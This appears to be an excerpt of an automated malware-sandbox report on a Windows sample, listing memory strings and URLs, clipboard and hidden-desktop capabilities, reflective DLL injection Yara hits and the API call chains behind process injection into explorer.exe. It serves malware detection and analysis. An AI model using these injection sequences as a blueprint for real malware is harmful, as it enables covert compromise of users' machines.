Source: explorer.exe, 00000002.00000002.2979823330.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1744073226.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2044663166.000000000C964000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: A91B.tmp.zx.exe, 00000008.00000003.1909381834.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 0000000B.00000003.1929353561.000002492B22B000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 0000000B.00000002.1932868155.000002492B22B000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 0000000B.00000003.1927472131.000002492B218000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 0000000B.00000003.1927616388.000002492B222000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 0000000B.00000003.1927959831.000002492B224000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.python.org/dev/peps/pep-0205/
Source: A91B.tmp.zx.exe, 0000000B.00000003.1926472085.000002492D281000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 0000000B.00000003.1926427005.000002492B224000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 0000000B.00000002.1933283917.000002492D1C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.python.org/download/releases/2.3/mro/.
Source: explorer.exe, 00000002.00000002.2979823330.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2044663166.000000000C893000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000002.00000000.1738931822.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2969120001.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000002.00000000.1738931822.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2969120001.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirmr
Source: explorer.exe, 00000002.00000000.1744073226.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2979823330.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000002.00000002.2973724478.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1740843885.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000002.00000002.2973724478.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1740843885.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000002.00000000.1737733068.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738236161.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2964470757.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2966311683.0000000003700000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000002.00000000.1740843885.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2973724478.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2973724478.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1740843885.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000002.00000000.1740843885.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2973724478.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: svchost.exe, 00000001.00000003.1710887914.000001F42FC23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: svchost.exe, 00000001.00000003.1710887914.000001F42FC23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000002.00000002.2969120001.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000002.00000002.2969120001.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: svchost.exe, 00000001.00000003.1710887914.000001F42FC23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: svchost.exe, 00000001.00000003.1710887914.000001F42FC23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: explorer.exe, 00000002.00000003.2044663166.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1744073226.000000000C5E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2979823330.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: A91B.tmp.zx.exe, 0000000B.00000002.1932658206.000002492B207000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 0000000B.00000003.1928152495.000002492B1D4000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 0000000B.00000003.1930611252.000002492B205000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 0000000B.00000003.1927536905.000002492B170000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: A91B.tmp.zx.exe, 0000000B.00000002.1933067117.000002492CE80000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: A91B.tmp.zx.exe, 0000000B.00000003.1927536905.000002492B170000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: A91B.tmp.zx.exe, 0000000B.00000002.1932658206.000002492B207000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 0000000B.00000003.1928152495.000002492B1D4000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 0000000B.00000003.1930611252.000002492B205000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 0000000B.00000003.1927536905.000002492B170000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: A91B.tmp.zx.exe, 0000000B.00000002.1932658206.000002492B207000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 0000000B.00000003.1928152495.000002492B1D4000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 0000000B.00000003.1930611252.000002492B205000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 0000000B.00000003.1927536905.000002492B170000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000002.00000002.2969120001.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: svchost.exe, 00000001.00000003.1710887914.000001F42FC23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEY
Source: svchost.exe, 00000001.00000003.1710887914.000001F42FC23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: explorer.exe, 00000002.00000003.2044663166.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1744073226.000000000C5E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2979823330.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com_
Source: explorer.exe, 00000002.00000003.2044663166.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1744073226.000000000C5E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2979823330.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000002.00000002.2979823330.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1744073226.000000000C557000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000002.00000003.2044663166.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1744073226.000000000C5E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2979823330.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: svchost.exe, 00000001.00000003.1710887914.000001F42FC23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904E09000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1913447880.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904E0C000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1900343813.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1910753387.0000029904E0C000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1910753387.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899474816.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899277559.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1912593435.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899760404.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899945578.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.8.dr, libffi-7.dll.8.dr, python38.dll.8.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: svchost.exe, 00000001.00000003.1710887914.000001F42FC23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2969120001.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000002.00000000.1738931822.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

Source: C:\Windows\explorer.exe

Code function: 2_2_0FC15E54 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

Contains functionality to modify clipboard data

Source: C:\Windows\explorer.exe	Code function: 2_2_0FC16050 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		2_2_0FC16050
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC44078 SetClipboardData,		2_2_0FC44078

Contains functionality to read the clipboard data

Source: C:\Windows\explorer.exe

Code function: 2_2_0FC15E54 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

Contains functionality to record screenshots

Source: C:\Windows\explorer.exe

2_2_0FC19950

Source: C:\Windows\explorer.exe

Code function: 2_2_0FC1A4A8 memset,memset,OpenDesktopA,CreateDesktopA,SetThreadDesktop,CreateThread,WaitForSingleObject,free,free,free,CloseHandle,CloseHandle,

2_2_0FC1A4A8

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.0.explorer.exe.7da0000.1.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 2.0.explorer.exe.7da0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 2.2.explorer.exe.9cb0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 2.2.explorer.exe.c350000.8.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 2.2.explorer.exe.7da0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 2.2.explorer.exe.fc00000.9.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 2.2.explorer.exe.9cb0000.3.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 2.2.explorer.exe.7da0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 2.2.explorer.exe.fc00000.9.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 2.2.explorer.exe.c350000.8.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000002.00000002.2976185947.0000000009CB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000002.00000002.2971350859.0000000007DA0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000002.00000002.2979697465.000000000C350000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000002.00000002.2983380179.000000000FC00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000002.00000000.1739477441.0000000007DA0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen

Abnormal high CPU Usage

Source: C:\Windows\System32\svchost.exe

Process Stats: CPU usage > 49%

Contains functionality to call native functions

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E1701AA4 GetTempPathW,GetTempFileNameW,RtlInitUnicodeString,NtOpenFile,NtSetInformationFile,NtWriteFile,GetLastError,	0_2_00007FF6E1701AA4
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E1701DF4 wcsnlen,GetModuleHandleA,GetProcAddress,lstrcatW,CreateProcessInternalW,NtMapViewOfSection,ResumeThread,	0_2_00007FF6E1701DF4
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E1701D08 NtCreateSection,GetFileSize,SetFilePointer,WriteFile,SetFilePointer,NtClose,	0_2_00007FF6E1701D08
Source: C:\Windows\explorer.exe	Code function: 2_2_09CBE948 CreateFileA,GetFileSize,malloc,ReadFile,CloseHandle,CreateProcessA,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,NtQueryInformationProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,free,	2_2_09CBE948
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699AB1AA4 GetTempPathW,GetTempFileNameW,RtlInitUnicodeString,NtOpenFile,NtSetInformationFile,NtWriteFile,GetLastError,	3_2_00007FF699AB1AA4
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699AB1DF4 wcsnlen,GetModuleHandleA,GetProcAddress,lstrcatW,CreateProcessInternalW,NtMapViewOfSection,ResumeThread,	3_2_00007FF699AB1DF4
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699AB1D08 NtCreateSection,GetFileSize,SetFilePointer,WriteFile,SetFilePointer,NtClose,	3_2_00007FF699AB1D08

Detected potential crypto function

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E1701AA4	0_2_00007FF6E1701AA4
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E170554C	0_2_00007FF6E170554C
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E1701DF4	0_2_00007FF6E1701DF4
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E171B2DC	0_2_00007FF6E171B2DC
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E171E678	0_2_00007FF6E171E678
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E1711690	0_2_00007FF6E1711690
